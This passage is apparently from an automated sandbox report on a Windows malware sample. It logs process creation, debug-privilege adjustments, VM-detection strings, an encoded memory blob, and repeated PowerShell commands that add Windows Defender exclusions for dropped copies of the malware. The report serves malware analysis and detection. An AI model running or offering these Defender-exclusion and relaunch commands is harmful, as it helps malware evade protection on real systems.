Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2747066121.000000001BE9D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: juptXkyeRvGsIZrQGeVEsrnWhD.exe, 0000002C.00000002.2590137351.00000000134F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: W4tW72sfAD.exe, 00000000.00000002.1775712295.000000001C03B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process token adjusted: Debug Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Queries volume information: C:\Users\user\Desktop\W4tW72sfAD.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Queries volume information: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Queries volume information: C:\Users\Public\Downloads\RuntimeBroker.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
